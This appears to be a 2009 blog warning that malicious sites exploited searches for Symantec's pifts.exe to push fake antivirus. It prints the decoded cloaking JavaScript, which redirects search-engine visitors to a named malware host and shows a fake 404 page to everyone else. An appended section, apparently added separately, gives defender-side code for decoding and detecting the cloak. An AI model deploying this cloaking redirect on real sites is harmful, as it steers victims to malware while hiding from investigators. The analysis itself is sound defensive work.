11th March 2009

Warning to users of Symantec/Norton Anti-Virus and Internet Security

Update: There is an official Symantec response on their forums, you can find it here.

______________

You are at risk from malware infection if you search Google, MSN, Yahoo and possibly other search engines for 'pifts.exe'. Details follow.

On Monday, Symantec screwed up an update, causing pifts.exe to bring up shady error messages. While it's unclear at the moment what's been happening over at Symantec's forums, it appears they have been removing posts related to pifts.exe, either because of a bot spamming their forums or simply because of too many complaints from users.

Either way, because there is no information, users have shifted their searches to Google and the like. Malware vendors have jumped straight at the opportunity and crafted websites that pretend to offer information on pifts.exe while trying to lure users into downloading viruses and malware.

In short, do not use any search engine to search for pifts.exe, and do not download any promised patches, fixes or updates from anywhere other than symantec.com, or you risk infection.

At the time of writing, there is no word from Symantec; please be patient and avoid Googling for a solution.

For the nerds out there, below is a breakdown of how the malware infects users' PCs.

How the Attack Works

The top Google search results for 'pifts.exe' lead to pages serving malware. This is done via JavaScript, which shows you what appears to be Windows Explorer displaying 'My Computer' with security alerts on all your drives. This is not real; it is a web page designed to look like Windows Explorer.

[Image: The fake Windows Explorer web page]

When the page loads, you will receive a popup message saying:

"Warning!!! Your computer contains various signs of viruses and malware programs presence. Your system requires immediate anti viruses check! Malware Defender 2009 will perform a quick and free scanning of your PC for viruses and malicious programs."

The scan will pretend to run, then inform you that "Your computer remains infected by Viruses!...". You will then receive a pop-up similar to the one shown below, which will attempt to download malware onto your PC.

[Image: Fake anti-virus warning]

The Javascript

The JavaScript code used on the infected websites offering solutions to the problem is URL encoded to obscure it; the decoded JavaScript is as follows. I've tidied it up a bit so it's more readable.

// Where did the visitor come from?
var r = document.referrer;

// Only visitors arriving from a search engine (or from a cached or
// translated copy of a results page) are sent on to the malware host.
if (r.indexOf("google") != -1 || r.indexOf("msn") != -1 ||
    r.indexOf("yahoo") != -1 || r.indexOf("search") != -1 ||
    r.indexOf("result") != -1 || r.indexOf("cache") != -1 ||
    r.indexOf("translate") != -1)
{
    // Redirect, passing this site's hostname and the full referrer along.
    document.location = "http://murtinreid.com/in.php?n=1500&s=" +
                        escape(location.hostname) +
                        "&p=" + escape(r).replace(/\+/g, "%2B");
} else {
    // Everyone else (direct visits, crawlers, anyone investigating) is
    // shown a fake Apache "404 Not Found" page so the site looks dead.
    document.title = "404 Not Found";
    document.write("<h1>Not Found</h1>The requested URL " +
        location.pathname + " was not found on this server.<p>" +
        "<hr><address>Apache/1.3.39 Server at " + location.hostname +
        " Port 80</address><br/><div style='display:none'>");
}

Basically, the code checks whether you came to the website from a search engine or entered the URL directly. If you came from a search engine, you are redirected to the URL 'murtinreid.com/in.php?n=1500&s=', which hosts the sites shown above and the malware. If you came any other way, the page shows a fake "404 Not Found" error instead, which is why visiting the page directly looks harmless.
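As an added example (not code from the original post, and not the malware's own code), here is a small analyst-side JavaScript script that does three things the breakdown above suggests a defender wants: decode an escape()-style URL-encoded script, model which Referer values the cloak reacts to (so you know why fetching the page directly only shows the fake 404), and flag the referrer-check-plus-redirect pattern in a page's script. The script it scans is constructed for this example and uses the placeholder host example.invalid in place of the real redirect target.

```javascript
// Added defender-side example; not code from the original post or from the
// malware. All sample inputs below are constructed for this example.

// Search-engine markers the decoded script in the post tests the referrer for.
const SEARCH_MARKERS = ["google", "msn", "yahoo", "search", "result", "cache", "translate"];

// Undo escape()-style encoding: %uXXXX units first, then %XX bytes.
function decodeObfuscatedScript(encoded) {
  return encoded
    .replace(/%u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Reproduce the cloak's decision so an analyst knows what a given Referer
// header will be shown: "redirect" for search-engine traffic, "decoy404" for
// everything else. The comparison is case-sensitive, as in the original.
function cloakOutcome(referrer) {
  const r = referrer || "";
  return SEARCH_MARKERS.some((m) => r.indexOf(m) !== -1) ? "redirect" : "decoy404";
}

// Heuristic scanner: a script that reads document.referrer, tests it against
// several search-engine names and then rewrites document.location matches
// the cloaking pattern from the post. Returns the evidence it found so the
// verdict is explainable rather than a bare true/false.
function scanForReferrerCloak(source) {
  const src = decodeObfuscatedScript(source);
  const evidence = {
    readsReferrer: /document\.referrer/.test(src),
    testsSearchEngines: SEARCH_MARKERS.filter((m) =>
      new RegExp(`indexOf\\(["']${m}["']\\)`).test(src)
    ),
    redirects: /(document|window)\.location(\.href)?\s*=/.test(src),
    fakes404: /404 Not Found/.test(src),
    redirectTargets: [...src.matchAll(/location(?:\.href)?\s*=\s*["']([^"']+)["']/g)]
      .map((m) => m[1]),
  };
  evidence.suspicious =
    evidence.readsReferrer && evidence.testsSearchEngines.length >= 2 && evidence.redirects;
  return evidence;
}

// Constructed sample in the shape of the decoded script from the post, with a
// placeholder redirect host. It is URL-encoded here the same way a cloaked
// page would ship it (ASCII only, so encodeURIComponent is equivalent to escape).
const CONSTRUCTED_SAMPLE_SCRIPT = `var r = document.referrer;
if (r.indexOf("google") != -1 || r.indexOf("yahoo") != -1) {
  document.location = "http://example.invalid/in.php?n=1500&s=" + escape(location.hostname);
} else {
  document.title = "404 Not Found";
}`;
const CONSTRUCTED_ENCODED_SAMPLE = encodeURIComponent(CONSTRUCTED_SAMPLE_SCRIPT);

// Stand-alone demo: what each kind of visitor sees, and what the scanner finds.
for (const ref of ["http://www.google.com/search?q=pifts.exe", "", "http://example.com/blog/"]) {
  console.log(JSON.stringify(ref), "->", cloakOutcome(ref));
}
console.log(JSON.stringify(scanForReferrerCloak(CONSTRUCTED_ENCODED_SAMPLE), null, 2));
```

The practical lesson of cloakOutcome is that reproducing the behaviour requires sending a search-engine-looking Referer header; a plain fetch returns only the decoy 404, which is exactly what the script's else branch is for. The scanner's threshold (two or more search-engine names plus a location rewrite) is an assumption chosen to keep ordinary analytics code from tripping it.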

Again, do not download any security updates from anywhere other than symantec.com.